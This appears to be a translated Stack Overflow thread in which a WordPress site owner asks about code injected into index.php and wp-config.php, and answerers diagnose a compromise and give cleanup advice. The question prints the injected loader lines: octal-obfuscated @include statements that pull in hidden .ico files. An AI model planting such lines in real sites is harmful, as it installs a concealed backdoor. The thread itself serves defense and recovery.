外星人代码出现在wordpress安装关键文件中

Posted 2023-02-19

【中文标题】外星人代码出现在wordpress安装关键文件中

【英文标题】：Alien code appears in wordpress installation critical files

【发布时间】：2019-11-05 10:11:39

【问题描述】：

从 4 天前到现在，我的网站中自动生成了一些代码，该网站使用 wordpress 作为 CMS。

index.php 文件中生成的代码是这样的：

/*12a36*/

@include "\057home\057ippl\145ir/p\165blic\137html\057blog\057wp-i\156clud\145s/ce\162tifi\143ates\057.3b4\141428f\056ico";

/*12a36*/

而在wp-config文件里面生成的代码是：

/*e2db6*/

@include "\057h\157m\145/\151p\160l\145i\162/\160u\142l\151c\137h\164m\154/\167p\055i\156c\154u\144e\163/\122e\161u\145s\164s\057R\145s\160o\156s\145/\0563\1455\065f\070d\062.\151c\157";

/*e2db6*/

正在运行的网站报告 404 错误。 我需要有关如何解决此问题的建议/帮助。

当这段代码在文件index.php和wp-config中生成时，我的服务器自动删除了index.php文件。

作为附加信息 - 我使用 i-theme 安全插件。

【问题讨论】：

您的 WordPress 安装已被恶意软件渗透。这可以通过多种方式完成。更改您的 FTP 凭据，删除您网站空间上的所有物理文件并重新安装您上次完成的备份。然后将您的软件更新到最新发布的版本。卸载不使用的插件和主题。

你被黑了...

您的网站可能被黑了。您需要手动删除此代码。只需检查 wp_upload 文件夹，通常 WordPress 网站通过此文件夹被黑。删除所有这些代码后，安装 WordPress 安全插件并正确检查。

【参考方案1】：

这只是表明您的网站被黑客入侵，可能来自一些被低估或过时的插件，您必须手动清理您的网站并更新插件和 WordPress 核心。

您可以使用在线扫描网站来确保攻击 [https://sitecheck.sucuri.net/]，也可能有一个外来的 [php] 文件将充当后门，请手动验证文件。

【参考方案2】：

您的网站可能已被黑客入侵/感染了恶意软件/病毒。

包含路径的代码点：

/home/ippleir/public_html/blog/wp-includes/certificates/.3b4a428f.ico

您应该清理同一服务器上存在的所有安装。

首先删除包含的文件/目录，然后您可以按照网上的许多指示或我的旧答案here on SO